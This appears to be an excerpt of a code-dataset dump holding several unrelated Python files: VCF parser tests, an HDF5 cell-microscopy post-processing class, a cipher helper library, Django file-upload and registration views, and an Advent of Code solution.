self.assertTrue(mock_reader.close_was_called)\n\n def test_vcf_records_raisesStopIterationWhenExhausted(self):\n file_contents = [\"##metaheader1\\n\",\n self.entab(\"#CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|FORMAT|SampleNormal|SampleTumor\\n\"),\n self.entab(\"chr1|1|.|A|C|.|.|INFO|FORMAT|NORMAL|TUMOR\\n\")]\n mock_reader = MockFileReader(\"my_dir/my_file.txt\", file_contents)\n reader = VcfReader(mock_reader)\n\n reader.open()\n record_iter = reader.vcf_records()\n next(record_iter)\n self.assertRaises(StopIteration,\n next,\n record_iter)\n\n def test_vcf_records_raisesTypeErrorWhenClosed(self):\n file_contents = [\"##metaheader1\\n\",\n self.entab(\"#CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|FORMAT|SampleNormal|SampleTumor\\n\"),\n self.entab(\"chr1|1|.|A|C|.|.|INFO|FORMAT|NORMAL|TUMOR\\n\")]\n mock_reader = MockFileReader(\"my_dir/my_file.txt\", file_contents)\n 
reader = VcfReader(mock_reader)\n\n record_iter = reader.vcf_records()\n self.assertRaises(TypeError,\n next,\n record_iter)\n\n def test_noColumnHeaders(self):\n mock_reader = MockFileReader(\"my_dir/my_file.txt\", [\"##metaheader\\n\"])\n self.assertRaises(utils.JQException, VcfReader, mock_reader)\n\n def test_noMetaheaders(self):\n mock_reader = MockFileReader(\"my_dir/my_file.txt\", [\"#columnHeader\\n\"])\n self.assertRaises(utils.JQException, VcfReader, mock_reader)\n\n def test_get_format_tag_list(self):\n file_contents = ['##FORMAT=\\n',\n '##FORMAT=\\n',\n '#columnHeader\\n',\n 'record1\\n',\n 'record2']\n mock_file_reader = MockFileReader(\"my_dir/my_file.txt\", file_contents)\n\n vcf_reader = VcfReader(mock_file_reader)\n actual_format_set = vcf_reader.format_metaheaders\n self.assertEquals([\"GQ\", \"GT\"], sorted(actual_format_set.keys()))\n\n def test_get_info_field_list(self):\n file_contents = ['##INFO=\\n',\n '##FORMAT=\\n',\n '##INFO=\\n',\n '#columnHeader\\n',\n 'record1\\n',\n 'record2']\n mock_file_reader = MockFileReader(\"my_dir/my_file.txt\", file_contents)\n\n vcf_reader = VcfReader(mock_file_reader)\n actual_format_set = vcf_reader.info_metaheaders\n expected_format_set = [\"AA\", \"AF\"]\n\n self.assertEquals(expected_format_set, sorted(actual_format_set.keys()))\n\nclass VcfWriterTestCase(unittest.TestCase):\n def test_write(self):\n with TempDirectory() as output_file:\n file_path = os.path.join(output_file.path, \"test.tmp\")\n\n writer = FileWriter(file_path)\n writer.open()\n writer.write(\"A\")\n writer.write(\"B\\n\")\n writer.write(\"CD\\n\")\n writer.close()\n\n actual_output = output_file.read('test.tmp', encoding='utf8')\n expected_output = \"AB|CD|\".replace('|', os.linesep)\n self.assertEquals(expected_output, actual_output)\n\nclass FileReaderTestCase(unittest.TestCase):\n def testCompare(self):\n expected_readers = [FileReader(\"1A.txt\"),\n FileReader(\"1B.txt\"),\n FileReader(\"2A.txt\"),\n FileReader(\"10A.txt\"),\n FileReader(\"10B.txt\"),\n FileReader(\"11A.txt\"),\n FileReader(\"11B.txt\"),\n FileReader(\"20A.txt\"),\n FileReader(\"100A.txt\")]\n input_readers = expected_readers[::-1]\n\n self.assertEquals(expected_readers, sorted(input_readers))\n\n def test_equality(self):\n self.assertEquals(FileReader(\"foo\"), FileReader(\"foo\"))\n self.assertNotEquals(FileReader(\"foo\"), FileReader(\"bar\"))\n self.assertNotEquals(FileReader(\"foo\"), 1)\n\n def test_hashable(self):\n s = set([FileReader(\"foo\")])\n s.add(FileReader(\"foo\"))\n self.assertEquals(1, len(s))\n\n def test_read_lines(self):\n with TempDirectory() as input_file:\n input_file.write(\"A.tmp\", b\"1\\n2\\n3\")\n reader = FileReader(os.path.join(input_file.path, \"A.tmp\"))\n reader.open()\n actual_lines = [line for line in reader.read_lines()]\n reader.close()\n\n self.assertEquals([\"1\\n\", \"2\\n\", \"3\"], actual_lines)\n\n def test_read_lines_raisesTypeErrorWhenClosed(self):\n with TempDirectory() as input_file:\n input_file.write(\"A.tmp\", b\"1\\n2\\n3\")\n reader = FileReader(os.path.join(input_file.path, \"A.tmp\"))\n line_iter = reader.read_lines()\n self.assertRaises(TypeError, next, line_iter)\n\nclass FileWriterTestCase(unittest.TestCase):\n def test_equality(self):\n self.assertEquals(FileWriter(\"foo\"), FileWriter(\"foo\"))\n self.assertNotEquals(FileWriter(\"foo\"), FileWriter(\"bar\"))\n self.assertNotEquals(FileWriter(\"foo\"), 1)\n\n def test_file_name(self):\n writer = FileWriter(\"foo/bar/baz.tmp\")\n self.assertEquals(\"baz.tmp\", 
writer.file_name)\n\n def test_hashable(self):\n s = set([FileWriter(\"foo\")])\n s.add(FileWriter(\"foo\"))\n self.assertEquals(1, len(s))\n\n def test_write_lines(self):\n with TempDirectory() as output_file:\n writer = FileWriter(os.path.join(output_file.path, \"A.tmp\"))\n writer.open()\n writer.write(\"1\\n2\\n\")\n writer.write(\"3\")\n writer.close()\n\n actual_file = open(os.path.join(output_file.path, \"A.tmp\"))\n actual_output = actual_file.readlines()\n actual_file.close()\n\n self.assertEquals([\"1\\n\", \"2\\n\", \"3\"], actual_output)\n","sub_path":"test/utils/vcf_test.py","file_name":"vcf_test.py","file_ext":"py","file_size_in_byte":44156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"223131493","text":"# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n# #\n# ----- POST-PROCESSING OF HDF FILES: APPENDING DATA OF ----- #\n# LOCAL CELL DENSITY, NUCLEUS SIZE & DNA CONTENT #\n# FROM FLUORESCENCE SIGNAL INTENSITY #\n# #\n# ----- Creator: Kristina ULICNA ----- #\n# #\n# ----- Last updated: 31th Jan 2020 ----- #\n# #\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n\nimport os\nimport sys\nimport h5py\nimport math\nimport numpy as np\nimport scipy.spatial as sp\nimport matplotlib.pyplot as plt\n\nfrom scipy.ndimage import label, find_objects\nfrom tqdm import tqdm\nfrom skimage import io\nfrom PIL import Image\n\nsys.path.append(\"../\")\nfrom Movie_Analysis_Pipeline.Single_Movie_Processing.Server_Movies_Paths import Get_MDCK_Movies_Paths\n\n\nclass Local_Density_Nucleus_Size_Fluo_Signal(object):\n\n def __init__(self, hdf5_file):\n \"\"\" Open & read data from chosen HDF5 file. TODO: This class only processes GFP cells. Deal with it!\n :param hdf5_file (str): absolute directory to file: .../HDF/segmented.hdf5\n \"\"\"\n\n self.hdf5_file = hdf5_file\n self.hdf5_file_to_read = h5py.File(hdf5_file, 'r')\n self.movie_length = len(self.hdf5_file_to_read[\"objects\"][\"obj_type_1\"][\"map\"])\n self.channels = len(list(self.hdf5_file_to_read.values())[0])\n\n GFP_length = len(self.hdf5_file_to_read[\"objects\"][\"obj_type_1\"][\"coords\"])\n\n if \"obj_type_1\" not in list(self.hdf5_file_to_read[\"objects\"]):\n raise ValueError(\"GFP channel not detected in the HDF5 file.\")\n\n self.position = hdf5_file.split(\"/pos\")[1].split(\"/\")[0]\n self.data_date = hdf5_file.split(\"/pos{}\".format(self.position))[0][-6:]\n\n # Initialise the movie if processing fluo_intensity:\n if self.data_date.startswith(\"AB\"):\n raw_movie = \"/Volumes/lowegrp/Data/Kristina/MDCK_WT_Pure/17_{}_{}/pos{}/GFP_pos{}.tif\" \\\n .format(self.data_date[2:4], self.data_date[4:6], self.position, self.position)\n self.raw_movie = io.imread(raw_movie)\n\n # Vectors to return:\n self.density = [0 for _ in range(GFP_length)]\n self.nucleus = [0 for _ in range(GFP_length)]\n self.fsignal = [0 for _ in range(GFP_length)]\n\n\n def Extract_Cell_Coords(self, frame):\n \"\"\" Extract the GFP and RFP cell coordinates, remembering the indexes of these cells.\n\n :param frame (int)\n :return: cell_coords (numpy.ndarray) [[x_coord, y_coord] [x_coord, y_coord] ... 
]\n                 cell_map (numpy.ndarray) [[0 88] [0 20]] -> indices of GFP & RFP cells per frame\n        \"\"\"\n\n        cell_coords = []\n        cell_map = []\n\n        for channel in range(1, self.channels + 1):\n            map = self.hdf5_file_to_read[\"objects\"][\"obj_type_{}\".format(channel)][\"map\"][frame]\n            cell_map.append(map)\n            for cell in range(map[0], map[1]):\n                cell_data = self.hdf5_file_to_read[\"objects\"][\"obj_type_{}\".format(channel)][\"coords\"][cell]\n                cell_coords.append([cell_data[1], cell_data[2]])\n        return np.array(cell_coords), np.array(cell_map)\n\n\n    def Return_Partial_Density(self, a, b, c):\n        \"\"\" Construct the triangle given the 'x' & 'y' coordinates of the nuclei centroids.\n            1.) Calculate the lengths of the edges of the triangle.\n            2.) Compute the approximate area of the whole cell.\n            3.) Return a cell density, i.e. an inverse of the cell area.\n\n        :param a, b, c (lists) -> [x_coord, y_coord] where 'x_coord' & 'y_coord' are (float)\n        :return partial_density (float) -> density of the triangle contributing to the cell's area\n        \"\"\"\n\n        a_edge = np.sqrt((b[0] - c[0]) ** 2 + (b[1] - c[1]) ** 2)\n        b_edge = np.sqrt((a[0] - c[0]) ** 2 + (a[1] - c[1]) ** 2)\n        c_edge = np.sqrt((a[0] - b[0]) ** 2 + (a[1] - b[1]) ** 2)\n\n        s = (a_edge + b_edge + c_edge) / 2\n        partial_area = np.sqrt(s * (s - a_edge) * (s - b_edge) * (s - c_edge))\n\n        # Guard against degenerate (collinear) centroids, where Heron's formula\n        # yields nan or a non-positive area:\n        if np.isnan(partial_area) or partial_area <= 0:\n            return 0.0\n        else:\n            return 1 / partial_area\n\n\n    def Calculate_Local_Density(self, frame, show=False):\n        \"\"\" Calculate the local density of every GFP & RFP cell in the specified frame\n        by summing the inverse areas of its adjacent Delaunay triangles. \"\"\"\n\n        # 1.) Extract the coordinates of all GFP & RFP cells at specified frame:\n        cell_coords, cell_map = self.Extract_Cell_Coords(frame=frame)\n\n        # Take care of blank frames:\n        if len(cell_coords) < 3: # a triangle cannot be created\n            return [0.0 for _ in range(len(cell_coords))]\n\n        # 2.) Use the coordinates to construct the Delaunay triangulation of all GFP & RFP cells:\n        tri = sp.Delaunay(cell_coords)\n        if show is True:\n            _ = sp.delaunay_plot_2d(tri=tri)\n            plt.xlim(0, 1200)\n            plt.ylim(0, 1600)\n            plt.title(\"Delaunay Triangulation for Local Density Calculations\")\n            plt.xlabel(\"FiJi Y-axis (pixels)\")\n            plt.ylabel(\"FiJi X-axis (pixels)\")\n            plt.show()\n            plt.close()\n\n        # 3.) Create an array of the length of points:\n        densities = [0 for _ in range(len(tri.points))]\n\n        # 4.) Calculate the density of each triangle & add to vertex:\n        for vertex_index, vertex_coords in zip(tri.simplices, cell_coords[tri.simplices]):\n            density = self.Return_Partial_Density(a=vertex_coords[0], b=vertex_coords[1], c=vertex_coords[2])\n            for index in vertex_index:\n                densities[index] += density\n\n        # 5.) Write these definitive cell densities into the big density array:\n        self.density[cell_map[0][0]:cell_map[0][1]] = np.array(densities, dtype=np.float64)\n\n        # 6.) Return an intermediate so you can check if correctly calculated:\n        return densities\n\n\n    # ---------------------------------------------------------------------------------------------------\n\n    def Calculate_Nuclei_Sizes(self, frame, show=False):\n        \"\"\" Process the respective binary mask (U-Net output with segmented labels)\n        to extract the pixel values of the image into 2D matrix to return.\n\n        1.) Import the 'segmentation' binary mask image & label the pixel values of individual objects.\n        2.) Allocate the nuclei centroids from HDF file to each uniquely labelled blob in the binary mask.\n        3.) Count the occurrence of the label in the processed binary mask & store its row & column indices.\n        4.) 
Access the corresponding pixels in the raw fluorescence image to calculate average signal intensity.\n \"\"\"\n\n cell_coords, cell_map = self.Extract_Cell_Coords(frame=frame)\n pixels = self.hdf5_file_to_read[\"segmentation\"][\"images\"][frame]\n\n # Enumerate different objects in the map with unique label & find those objects in the image:\n object_labels, num_features = label(input=pixels)\n found_objects = find_objects(object_labels)\n\n if num_features != len(found_objects):\n raise ValueError(\"Warning, number of labelled objects & the objects found with unique label are not equal!\")\n\n # Visualise the binary map & labelled map:\n if show is True:\n plt.imshow(X=pixels) # plots a 2D array straight ahead!\n plt.title(\"Raw Segmented Binary Mask at frame #{}\".format(frame))\n plt.show()\n plt.close()\n\n plt.imshow(X=object_labels) # plots a 2D array straight ahead!\n plt.title(\"Labelled Segmented Binary Mask at frame #{}\".format(frame))\n plt.show()\n plt.close()\n\n # Match coords to its unique label & sum the appearance of the label in the slice:\n nuclei_size = []\n for coords in cell_coords:\n x, y = int(math.floor(coords[0])), int(math.floor(coords[1]))\n pixel_label = object_labels[x][y]\n image_slice = object_labels[found_objects[pixel_label - 1]]\n nucleus_size = sum([list(row).count(pixel_label) for row in image_slice])\n nuclei_size.append(nucleus_size)\n\n # Append these sizes into the final array:\n self.nucleus[cell_map[0][0]:cell_map[0][1]] = np.array(nuclei_size, dtype=np.float64)\n\n return nuclei_size, object_labels, found_objects\n\n\n # ---------------------------------------------------------------------------------------------------\n\n def Calculate_Fluo_Intensity(self, frame, show=False):\n \"\"\" Calculate the average fluorescence intensity of the nucleus based on the pixel value readouts\n from areas superimposed by uniquely labelled binary mask areas by summing them up & averaging.\n\n :param! 
raw_images (str) -> absolute directory to folder:\n\n                     Anna's movies: e.g./Volumes/lowegrp/Data/Kristina/MDCK_WT_Pure/17_07_31/pos8/...\n                                    which contains STACK TIFFs: 'BF_pos8.tif', 'GFP_pos8.tif', 'RFP_pos8.tif'\n                     Giulia's movies: e.g./Volumes/lowegrp/Data/Giulia/GV0800/pos0/Pos0_aligned/\n                                    which contains original BF, GFP & RFP images: e.g.\n                                    'img_channel001_position013_time000001104_z000.tif'\n        \"\"\"\n\n        cell_coords, cell_map = self.Extract_Cell_Coords(frame=frame)\n        nuclei_size, object_labels, found_objects = self.Calculate_Nuclei_Sizes(frame=frame)\n        fluo_signal_intensity_sum = [0 for _ in range(len(nuclei_size))]\n\n        # Initialise the raw images for Anna's & Giulia's movies:\n        if self.data_date.startswith(\"AB\"):\n            raw_image = self.raw_movie[frame]\n\n        elif self.data_date.startswith(\"GV\"):\n            raw_image = \"/Volumes/lowegrp/Data/Giulia/{}/pos{}/Pos{}_aligned/img_channel001_position{}_time00000{}_z000.tif\" \\\n                .format(self.data_date, self.position, self.position, self.position.zfill(3), str(frame).zfill(4))\n\n        elif self.data_date.startswith(\"KU\"):\n            raw_image = \"/Volumes/lowegrp/Data/Kristina/Cells_HeLa/{}/Pos{}/img_channel001_position{}_time00000{}_z000.tif\" \\\n                .format(self.data_date, self.position, self.position.zfill(3), str(frame).zfill(4))\n        else:\n            raise Exception(\"Directory data_date does not start with 'AB', 'GV' or 'KU'!\")\n\n\n        # Check if the frame exists & resize appropriately:\n        if not os.path.isfile(raw_image):\n            return np.array(fluo_signal_intensity_sum, dtype=np.float64)\n\n        # Process the full-sized image (1739 x 1379 pixels):\n        image = Image.open(raw_image).convert('L') # converts the image to 8-bit grayscale\n        img_w, img_h = image.size # stores image dimensions:\n        new_w, new_h = 1600, 1200\n\n        # Define center & crop image accordingly... 
TODO: Python & FiJi have different offsets!\n if img_w != new_w or img_h != new_h:\n left = (img_w - 1 - new_w) / 2\n top = (img_h - 1 - new_h) / 2\n right = (img_w - 1 + new_w) / 2\n bottom = (img_h - 1 + new_h) / 2\n raw_image = np.array(image.crop((left, top, right, bottom))) # convert 'PIL.Image.Image' to 'numpy.ndarray'\n\n # Superimpose the segmented masks with unique labels to the raw fluorescence readout images:\n if len(cell_coords) != len(nuclei_size):\n raise ValueError(\"Not every cell nucleus had had it's size calculated.\")\n\n for enum, (coords, size) in enumerate(zip(cell_coords, nuclei_size)):\n if size == 0:\n fluo_signal_intensity_sum[enum] = 0.0\n else:\n x, y = int(math.floor(coords[0])), int(math.floor(coords[1]))\n pixel_label = object_labels[x][y]\n found_loc = found_objects[pixel_label - 1]\n image_slice_mask = object_labels[found_loc]\n image_slice_fluo = raw_image[found_loc]\n\n # This script calculates the sum of the signal intensity per whole nucleus:\n for row_mask, row_fluo in zip(image_slice_mask, image_slice_fluo):\n for label_pixel, raw_pixel in zip(row_mask, row_fluo):\n if label_pixel == pixel_label:\n fluo_signal_intensity_sum[enum] += raw_pixel\n\n self.fsignal[cell_map[0][0]:cell_map[0][1]] = np.array(fluo_signal_intensity_sum, dtype=np.float64)\n return np.array(fluo_signal_intensity_sum, dtype=np.float64)\n\n\n # ---------------------------------------------------------------------------------------------------\n\n def Process_Whole_Movie(self, local_density=False, nucleus_size=False, fluo_signal=False):\n \"\"\" \"\"\"\n\n for frame in tqdm(range(0, self.movie_length)):\n #for frame in tqdm(range(0, 10)):\n\n #if frame % 100 == 0:\n # print(\"\\nCalculating for frame #{} out of {} frames...\".format(frame, self.movie_length))\n\n if local_density is True:\n self.Calculate_Local_Density(frame=frame)\n if nucleus_size is True:\n self.Calculate_Nuclei_Sizes(frame=frame)\n if fluo_signal is True:\n self.Calculate_Fluo_Intensity(frame=frame)\n\n if self.hdf5_file_to_read.__bool__():\n self.hdf5_file_to_read.close()\n\n return self.density, self.nucleus, self.fsignal\n\n\n def Append_To_HDF(self, local_density=False, nucleus_size=False, fluo_signal=False):\n\n density, nucleus, fsignal = self.Process_Whole_Movie(local_density=local_density,\n nucleus_size=nucleus_size,\n fluo_signal=fluo_signal)\n\n with h5py.File(self.hdf5_file, 'a') as f:\n\n if local_density is True:\n if \"local_density\" in list(f[\"objects\"][\"obj_type_1\"]):\n del f[\"objects\"][\"obj_type_1\"][\"local_density\"]\n grp_d = f[\"objects\"][\"obj_type_1\"]\n grp_d.create_dataset(name=\"local_density\", data=density)\n\n if nucleus_size is True:\n if \"nucleus_size\" in list(f[\"objects\"][\"obj_type_1\"]):\n del f[\"objects\"][\"obj_type_1\"][\"nucleus_size\"]\n grp_n = f[\"objects\"][\"obj_type_1\"]\n grp_n.create_dataset(name=\"nucleus_size\", data=nucleus)\n\n if fluo_signal is True:\n if \"fluo_signal_sum\" in list(f[\"objects\"][\"obj_type_1\"]):\n del f[\"objects\"][\"obj_type_1\"][\"fluo_signal_sum\"]\n grp_f = f[\"objects\"][\"obj_type_1\"]\n grp_f.create_dataset(name=\"fluo_signal_sum\", data=fsignal)\n\n\n def __exit__(self):\n self.hdf5_file_to_read.close()\n\n\n\n\n# Call the class:\nmovies = Get_MDCK_Movies_Paths()\n\nfor movie in movies:\n if \"GV\" in movie:\n hdf5_file = movie + \"HDF/segmented.hdf5\"\n print (\"Calculating for {}\".format(hdf5_file))\n Local_Density_Nucleus_Size_Fluo_Signal(hdf5_file=hdf5_file).Append_To_HDF(nucleus_size=True, 
fluo_signal=True)\n\n","sub_path":"PostProcessing_HDF_Data/Local_Density_Nucleus_Size_Fluo_Signal_Create_Class.py","file_name":"Local_Density_Nucleus_Size_Fluo_Signal_Create_Class.py","file_ext":"py","file_size_in_byte":15432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"350431364","text":"#library file of shared functions\nimport sys\nimport string\n\n\ndef caesar(text, key):\n for i in text:\n if i.isalpha():\n i = i.lower()\n shifted = chr( ord(i) + key)\n if shifted.isalpha() == 0:\n shifted = chr( ord(shifted) - 26)\n sys.stdout.write(shifted)\n else:\n sys.stdout.write(i)\n\n\ndef removeDuplicates(text): #remove duplicate characters in a string\n seen = set()\n unique = []\n for char in text:\n if char not in seen:\n seen.add(char)\n unique.append(char)\n\n return \"\".join(unique) #string of unique characters\n\n\ndef chunkText(text): #chunk string of text into blocks of 2 with a space in between each chunk\n chunked = \"\"\n for c in range(0, len(text), 2):\n chunked = chunked + text[c:c+2] + \" \"\n\n return chunked\n\n\ndef replaceCharacters(text, in_table, out_table): #replace chars from 'in_table' with chars from 'out_table'\n table = string.maketrans(in_table, out_table)\n return text.translate(table)\n\n\ndef findLetter(dictionary, row, column): #find a key in a dictionary where the associated value is a tuple of numbers\n for k, v in dictionary.iteritems(): #iterate over key-value pairs to find key with specific value we searched for\n if v == (row, column): #'k' stands for key of dictionary, 'v' is a value associated with a key in a dictionary\n return k\n\n\ndef onlyAlphabetChars(text):\n text = filter(lambda c: c.isalpha(), text)\n return text\n ","sub_path":"P01/library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"144826716","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\nimport os\nfrom django.http import HttpResponseRedirect\nfrom Workgroup.models import UploadFile, Links_Tables, Metalinks\nfrom Workgroup.settings import STATICFILES_DIRS\nfrom file_manage.forms import UploadForm\nfrom django.contrib import messages\n\nfrom django.utils.translation import ugettext as _\n\ndef addfile(request, src_name, src_id):\n if not request.user.is_authenticated():\n return HttpResponseRedirect('/welcome/')\n\n if request.method == 'POST':\n link = Links_Tables.objects.get(Src_name=src_name.upper(), Dst_name=\"FILES\")\n metalink = Metalinks.objects.filter(Link_tables=link, Src_id=src_id)\n if not link:\n messages.error(request, _(u'Невозможно добавить файл'))\n return HttpResponseRedirect(request.META['HTTP_REFERER'])\n if metalink:\n parent_id = metalink[0].Dst_id\n else:\n parent_id = 0\n\n\n uploadform = UploadForm(request.POST or None, request.FILES or None)\n if uploadform.is_valid():\n f =request.FILES['File']\n if parent_id:\n new_file = UploadFile(FileName=f.name, Owner=request.user, File=f, Parent_id=parent_id)\n new_file.save()\n else:\n new_file = UploadFile(FileName=f.name, Owner=request.user, File=f)\n new_file.save()\n metalink = Metalinks(Link_tables=link, Src_id=src_id, Dst_id=new_file.id)\n metalink.save()\n messages.success(request, _(u'Файл был добавлен'))\n else:\n uploadform = UploadForm(None, None)\n \n return HttpResponseRedirect(request.META['HTTP_REFERER'])\n \n \ndef delfile(request, file_id):\n if not request.user.is_authenticated():\n return 
HttpResponseRedirect('/welcome/')\n \n try:\n del_file = UploadFile.objects.get(id=file_id) \n except:\n messages.error(request, _(u'Файл не найден'))\n return HttpResponseRedirect(request.META['HTTP_REFERER'])\n \n if del_file.Owner != request.user:\n messages.error(request, _(u'Недостаточно прав'))\n else:\n print((STATICFILES_DIRS[0] + str(del_file.File)))\n if os.path.isfile(STATICFILES_DIRS[0] + str(del_file.File)):\n os.remove(STATICFILES_DIRS[0] + str(del_file.File))\n f_name = del_file.FileName\n del_file.delete()\n messages.success(request, str(f_name) + _(u' был успешно удален'))\n\n \n return HttpResponseRedirect(request.META['HTTP_REFERER'])","sub_path":"file_manage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"431079436","text":"# tags: sliding window\n\nfrom compytetive.util import benchmark\nfrom compytetive import sliding_window\n\n\ndef read_input(filename):\n with open(filename, \"r\", encoding=\"utf-8\") as f:\n data = f.read()\n return data\n\n\ndef part1(data):\n for i, w in enumerate(sliding_window(data, 4, 1)):\n if len(set(w)) == len(w):\n return i + 4\n\n\ndef part2(data):\n for i, w in enumerate(sliding_window(data, 14, 1)):\n if len(set(w)) == len(w):\n return i + 14\n\n\ndef main():\n test1_input = read_input(\"test1.in\")\n real_input = read_input(\"input.in\")\n\n print(benchmark(part1, 50)(real_input))\n print(benchmark(part2, 50)(real_input))\n\n assert part1(test1_input) == 7\n assert part2(test1_input) == 19\n assert part1(real_input) == 1175\n assert part2(real_input) == 3217\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"advent-of-code-2022/06/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"317515943","text":"# -*- coding: UTF-8 -*-\nimport hashlib\n\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User, Permission\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.core.urlresolvers import reverse\nfrom django.db import IntegrityError\nfrom django.http import HttpResponseRedirect\nimport django.apps\n\n\nfrom DeBar.classes import message\nfrom DeBar.classes.cadastros.cargo import C_Cargo\nfrom DeBar.classes.captcha import Captcha\nfrom DeBar.classes.endereco.cep import CEP\nfrom DeBar.classes.endereco.complemento import Complemento\nfrom DeBar.classes.endereco.estado import Estado\nfrom DeBar.classes.endereco.numero import Numero\nfrom DeBar.classes.endereco.ruabairrocidade import RuaBairroCidade\nfrom DeBar.classes.estabelecimento.cnpj import CNPJ\nfrom DeBar.classes.estabelecimento.nome import NomeEstabelecimento\nfrom DeBar.classes.estabelecimento.tipoestabelecimento import TipoEstabelecimentoSelecionado\nfrom DeBar.classes.sendemail import SendEmail\nfrom DeBar.classes.texto import Text\nfrom DeBar.classes.usuario.cpf import CPF\nfrom DeBar.classes.usuario.email import Email\nfrom DeBar.classes.usuario.nome import Nome, Sobrenome\nfrom DeBar.classes.usuario.nomeusuario import NomeUsuario\nfrom DeBar.classes.usuario.senha import Senha\nfrom DeBar.classes.usuario.telefone import Telefone\nfrom DeBar.classes.variavel import Variavel\nfrom DeBar.funcoes.function import getCadastro, getUser\nfrom DeBar.funcoes.function import getSessionVariavel\nfrom DeBar.funcoes.function import setSessionVariavel\nfrom DeBar.funcoes.render 
import renderizar\nfrom DeBar.models import Cargo\nfrom DeBar.models.cadastro import Cadastro, Usuario\nfrom DeBar.models.estabelecimento import TipoEstabelecimento, Estabelecimento\n\n\ndef cadastraBasico (request):\n\n return renderizar(request, 'cadastro.html')\n\n############################################################################################################\n############################################################################################################\n\n@login_required\ndef dadosPessoais (request, id=None):\n\n#########################################################################################################\n# pega o usuário logado e checa se ele ainda está ativo na sessão #\n#########################################################################################################\n try:\n user = request.user\n cadastro = Cadastro.objects.get(usuario_id = user.id)\n except:\n message.erro(request, Text().login_expirou())\n return HttpResponseRedirect(reverse('LOGIN_PRINCIPAL'))\n\n#########################################################################################################\n# monta a variavel com todos os dados para caso haja um erro #\n# dessa maneiras os campos já preenchidos continuam com seu valor #\n# e os avisos são mostrados em cada campo #\n#########################################################################################################\n\n variavel = Variavel({\"nome\": user.first_name,\n \"sobrenome\": user.last_name,\n \"email\": cadastro.email,\n \"telefone\": cadastro.telefone})\n\n\n setSessionVariavel(request, variavel)\n\n return renderizar(request, 'cadastro_dados_pessoais.html')\n\n############################################################################################################\n############################################################################################################\n\n@login_required\ndef dadosEstabelecimento(request):\n\n#########################################################################################################\n# busca os dados do usuário #\n#########################################################################################################\n try:\n user = request.user\n cadastro = Cadastro.objects.get(usuario_id = user.id)\n except:\n message.erro(request, Text().login_expirou())\n return HttpResponseRedirect(reverse('LOGIN_PRINCIPAL'))\n\n#########################################################################################################\n# monta a variavel com todos os dados para caso haja um erro #\n# se não houver variavel ainda, busca o nome do estabelecimento #\n# do cadastro já feito #\n#########################################################################################################\n\n variavel = getSessionVariavel(request)\n\n if not variavel:\n variavel = Variavel({\"nomeEstabelecimento\":cadastro.nomeEstabelecimento})\n\n setSessionVariavel(request, variavel)\n\n tipoEstabelecimento = TipoEstabelecimento.objects.filter(ativo = True)\n\n return renderizar(request, 'cadastro_estabelecimento.html', tipoEstabelecimento)\n\n############################################################################################################\n############################################################################################################\n\ndef emailenviado(request):\n\n return renderizar(request, 
'cadastro_emailenviado.html')\n\n############################################################################################################\n############################################################################################################\n\ndef reenviaremail (request):\n\n nome = \"\"\n email = \"\"\n\n#########################################################################################################\n# busca a variavel da sessão para pegar o email para reenvid #\n#########################################################################################################\n\n variavel = getSessionVariavel(request)\n nome = variavel['nome'].valor\n email = variavel['email'].valor\n\n if email:\n\n #se tiver um email o codifica e envia novamente\n hash = hashlib.md5(email)\n try:\n SendEmail().email_cadastro(nome, email, hash)\n except:\n pass\n message.mensagem(request, Text().email_enviado_novamente())\n return HttpResponseRedirect(reverse('CADASTRAR_EMAILENVIADO'))\n\n else:\n message.erro(request, Text().email_nao_cadastrado())\n return HttpResponseRedirect(reverse('CADASTRAR'))\n\n############################################################################################################\n############################################################################################################\n\ndef validaremail(request, hash):\n\n#########################################################################################################\n# pega o hash d URL e checa se existe um cadastro com a mesma hash #\n#########################################################################################################\n\n try:\n cadastro = Cadastro.objects.get(hashcode = hash)\n except ObjectDoesNotExist:\n message.erro(request, Text().cadastro_nao_existe())\n return HttpResponseRedirect(reverse('CADASTRAR'))\n except:\n message.erro(request, Text().nao_existe_ou_nao_encontrado())\n return HttpResponseRedirect(reverse('CADASTRAR'))\n\n#########################################################################################################\n# valida se aquele email já foi validado anteriormente #\n#########################################################################################################\n\n if cadastro.checado:\n message.erro(request, Text().email_ja_validado())\n return HttpResponseRedirect(reverse('LOGIN_PRINCIPAL'))\n\n#########################################################################################################\n# se o email nao tiver sido validado o validar e salva o cadastro #\n#########################################################################################################\n\n try:\n cadastro.checado = True\n user = User.objects.get(id = cadastro.usuario.id)\n user.is_active = True\n user.save()\n cadastro.save()\n except:\n message.erro(request, Text().erro_comunicacao_banco_dados() +\" \"+ Text().email_nao_validado())\n\n message.mensagem(request, Text().email_validado_sucesso())\n return HttpResponseRedirect(reverse('LOGIN_PRINCIPAL'))\n\n############################################################################################################\n############################################################################################################\n\ndef validarCadastroBasico(request):\n\n#########################################################################################################\n# busca toda as variáveis vindas da tela e monta as classes 
